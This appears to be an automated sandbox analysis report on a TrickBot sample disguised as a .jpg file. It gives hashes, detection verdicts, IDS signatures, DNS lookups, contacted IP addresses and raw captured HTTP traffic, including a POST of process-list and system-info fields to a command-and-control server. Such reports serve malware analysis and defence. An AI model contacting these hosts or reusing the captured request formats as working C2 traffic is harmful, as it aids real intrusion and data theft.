paladin316

1489Trickbot_30c35d8c6f6691cc967ef79d3847ee4c_jpg_2019-09-10_19_30.txt

Sep 10th, 2019
  1.  
  2. * ID: 1489
  3. * MalFamily: "TrickBot"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Trickbot_30c35d8c6f6691cc967ef79d3847ee4c.jpg"
  8. * File Size: 17408
  9. * File Type: "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
  10. * SHA256: "9e7645f45c092e203c5795663a5b8ba0862987a5e4a2d04b024c935ed23e032c"
  11. * MD5: "30c35d8c6f6691cc967ef79d3847ee4c"
  12. * SHA1: "e7c94298f843cb89039b2dfd5531a46ed50cf5fc"
  13. * SHA512: "90cea89684c733e5c5eb319994ae16349c8f820a3ab591e7985248f2dcebe4174ca075778d70afa9ef9134db599a33cc84878e63b3cafcc9059065c0093cc11a"
  14. * CRC32: "33CBADAF"
  15. * SSDEEP: "384:B3ZsZrjpFINb0vNZl53XZFk8990ZUjbd/axM8GTf8pKc/78+i8NxBMYXkat:B3ZsZrjpFINb0vNZl53XZFk8990ZUPdK"
  16.  
  17. * Process Execution:
  18.  
  19. * Executed Commands:
  20.  
  21. * Signatures Detected:
  22.  
  23. "Description": "Communicates with IPs located across a large number of unique countries",
  24. "Details":
  25.  
  26. "country": "Bulgaria"
  27.  
  28.  
  29. "country": "United States"
  30.  
  31.  
  32. "country": "unknown"
  33.  
  34.  
  35. "country": "Ukraine"
  36.  
  37.  
  38. "country": "France"
  39.  
  40.  
  41. "country": "Brazil"
  42.  
  43.  
  44.  
  45.  
  46. "Description": "File has been identified as malicious by 6 antivirus engines on VirusTotal",
  47. "Details":
  48.  
  49. "Cylance": "Unsafe"
  50.  
  51.  
  52. "APEX": "Malicious"
  53.  
  54.  
  55. "Endgame": "malicious (high confidence)"
  56.  
  57.  
  58. "FireEye": "Generic.mg.30c35d8c6f6691cc"
  59.  
  60.  
  61. "SentinelOne": "DFI - Malicious PE"
  62.  
  63.  
  64. "CrowdStrike": "win/malicious_confidence_80% (D)"
  65.  
  66.  
  67.  
  68.  
  69. "Description": "Multiple direct IP connections",
  70. "Details":
  71.  
  72. "direct_ip_connections": "Made direct connections to 7 unique IP addresses"
  73.  
  74.  
  75.  
  76.  
  77. "Description": "HTTP traffic contains suspicious features that may be indicative of malware-related traffic",
  78. "Details":
  79.  
  80. "post_no_referer": "HTTP traffic contains a POST request with no Referer header"
  81.  
  82.  
  83. "ip_hostname": "HTTP connection was made directly to an IP address rather than to a domain name"
  84.  
  85.  
  86. "suspicious_request_iocs": "http://69.16.254.181/JdNG9d"
  87.  
  88.  
  89. "suspicious_request_iocs": "http://hrpm.ca/images/result.php"
  90.  
  91.  
  92. "suspicious_request_iocs": "http://icanhazip.com/"
  93.  
  94.  
  95. "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90"
  96.  
  97.  
  98. "suspicious_request_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/"
  99.  
  100.  
  101.  
  102.  
  103. "Description": "Performs some HTTP requests",
  104. "Details":
  105.  
  106. "url_iocs": "http://69.16.254.181/JdNG9d"
  107.  
  108.  
  109. "url_iocs": "http://hrpm.ca/images/result.php"
  110.  
  111.  
  112. "url_iocs": "http://icanhazip.com/"
  113.  
  114.  
  115. "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90"
  116.  
  117.  
  118. "url_iocs": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/"
  119.  
  120.  
  121.  
  122.  
  123. "Description": "Looks up the external IP address",
  124. "Details":
  125.  
  126. "domain": "icanhazip.com"
  127.  
  128.  
  129.  
  130.  
  131. "Description": "Created network traffic indicative of malicious activity",
  132. "Details":
  133.  
  134. "signature": "ET CNC Feodo Tracker Reported CnC Server group 21"
  135.  
  136.  
  137. "signature": "ET CNC Feodo Tracker Reported CnC Server group 2"
  138.  
  139.  
  140. "signature": "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)"
  141.  
  142.  
  143. "signature": "ET CNC Feodo Tracker Reported CnC Server group 4"
  144.  
  145.  
  146. "signature": "ET TROJAN PTsecurity Trickbot Data Exfiltration"
  147.  
  148.  
  149.  
  150.  
  151.  
  152. * Started Service:
  153.  
  154. * Mutexes:
  155.  
  156. * Modified Files:
  157.  
  158. * Deleted Files:
  159.  
  160. * Modified Registry Keys:
  161.  
  162. * Deleted Registry Keys:
  163.  
  164. * DNS Communications:
  165.  
  166. "type": "A",
  167. "request": "hrpm.ca",
  168. "answers":
  169.  
  170. "data": "162.208.2.182",
  171. "type": "A"
  172.  
  173.  
  174.  
  175.  
  176. "type": "A",
  177. "request": "icanhazip.com",
  178. "answers":
  179.  
  180. "data": "104.20.16.242",
  181. "type": "A"
  182.  
  183.  
  184. "data": "104.20.17.242",
  185. "type": "A"
  186.  
  187.  
  188.  
  189.  
  190. "type": "A",
  191. "request": "238.175.207.91.zen.spamhaus.org",
  192. "answers":
  193.  
  194. "data": "",
  195. "type": "NXDOMAIN"
  196.  
  197.  
  198.  
  199.  
  200. "type": "A",
  201. "request": "238.175.207.91.cbl.abuseat.org",
  202. "answers":
  203.  
  204. "data": "127.0.0.2",
  205. "type": "A"
  206.  
  207.  
  208.  
  209.  
  210.  
  211. * Domains:
  212.  
  213. "ip": "127.0.0.4",
  214. "domain": "238.175.207.91.zen.spamhaus.org"
  215.  
  216.  
  217. "ip": "104.20.17.242",
  218. "domain": "icanhazip.com"
  219.  
  220.  
  221. "ip": "162.208.2.182",
  222. "domain": "hrpm.ca"
  223.  
  224.  
  225. "ip": "127.0.0.2",
  226. "domain": "238.175.207.91.cbl.abuseat.org"
  227.  
  228.  
  229.  
  230. * Network Communication - ICMP:
  231.  
  232. * Network Communication - HTTP:
  233.  
  234. "count": 1,
  235. "body": "",
  236. "uri": "http://69.16.254.181/JdNG9d",
  237. "user-agent": "OnkyoblasterOS X-f5.99",
  238. "method": "GET",
  239. "host": "69.16.254.181",
  240. "version": "1.1",
  241. "path": "/JdNG9d",
  242. "data": "GET /JdNG9d HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: 69.16.254.181\r\nConnection: Keep-Alive\r\n\r\n",
  243. "port": 80
  244.  
  245.  
  246. "count": 1,
  247. "body": "",
  248. "uri": "http://hrpm.ca/images/result.php",
  249. "user-agent": "OnkyoblasterOS X-f5.99",
  250. "method": "GET",
  251. "host": "hrpm.ca",
  252. "version": "1.1",
  253. "path": "/images/result.php",
  254. "data": "GET /images/result.php HTTP/1.1\r\nUser-Agent: OnkyoblasterOS X-f5.99\r\nHost: hrpm.ca\r\nConnection: Keep-Alive\r\n\r\n",
  255. "port": 80
  256.  
  257.  
  258. "count": 1,
  259. "body": "",
  260. "uri": "http://icanhazip.com/",
  261. "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36",
  262. "method": "GET",
  263. "host": "icanhazip.com",
  264. "version": "1.1",
  265. "path": "/",
  266. "data": "GET / HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3731.0 Safari/537.36\r\nHost: icanhazip.com\r\n\r\n",
  267. "port": 80
  268.  
  269.  
  270. "count": 1,
  271. "body": "--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
  272. "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90",
  273. "user-agent": "test",
  274. "method": "POST",
  275. "host": "170.238.117.187:8082",
  276. "version": "1.1",
  277. "path": "/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90",
  278. "data": "POST /wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/90 HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=Arasfjasu7\r\nUser-Agent: test\r\nHost: 170.238.117.187:8082\r\nContent-Length: 154\r\nCache-Control: no-cache\r\n\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n",
  279. "port": 8082
  280.  
  281.  
  282. "count": 1,
  283. "body": "",
  284. "uri": "http://170.238.117.187:8082/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/",
  285. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  286. "method": "POST",
  287. "host": "170.238.117.187",
  288. "version": "1.1",
  289. "path": "/wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/",
  290. "data": "POST /wmd14/Host_W617601.D9936AC2B15997B35B9FDDFD52F37B1F/83/ HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 170.238.117.187\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------UUAPUKXHESSJPTKD\r\nContent-Length: 286\r\n\r\n",
  291. "port": 8082
  292.  
  293.  
  294.  
  295. * Network Communication - SMTP:
  296.  
  297. * Network Communication - Hosts:
  298.  
  299. "country_name": "Bulgaria",
  300. "ip": "79.124.49.206",
  301. "inaddrarpa": "",
  302. "hostname": ""
  303.  
  304.  
  305. "country_name": "United States",
  306. "ip": "69.16.254.181",
  307. "inaddrarpa": "",
  308. "hostname": ""
  309.  
  310.  
  311. "country_name": "unknown",
  312. "ip": "45.80.148.173",
  313. "inaddrarpa": "",
  314. "hostname": ""
  315.  
  316.  
  317. "country_name": "Ukraine",
  318. "ip": "195.123.242.175",
  319. "inaddrarpa": "",
  320. "hostname": ""
  321.  
  322.  
  323. "country_name": "France",
  324. "ip": "178.33.26.175",
  325. "inaddrarpa": "",
  326. "hostname": ""
  327.  
  328.  
  329. "country_name": "Brazil",
  330. "ip": "170.238.117.187",
  331. "inaddrarpa": "",
  332. "hostname": ""
  333.  
  334.  
  335. "country_name": "United States",
  336. "ip": "162.208.2.182",
  337. "inaddrarpa": "",
  338. "hostname": "hrpm.ca"
  339.  
  340.  
  341. "country_name": "United States",
  342. "ip": "107.173.160.19",
  343. "inaddrarpa": "",
  344. "hostname": ""
  345.  
  346.  
  347. "country_name": "United States",
  348. "ip": "104.20.16.242",
  349. "inaddrarpa": "",
  350. "hostname": "icanhazip.com"
  351.  
  352.  
  353.  
  354. * Network Communication - IRC: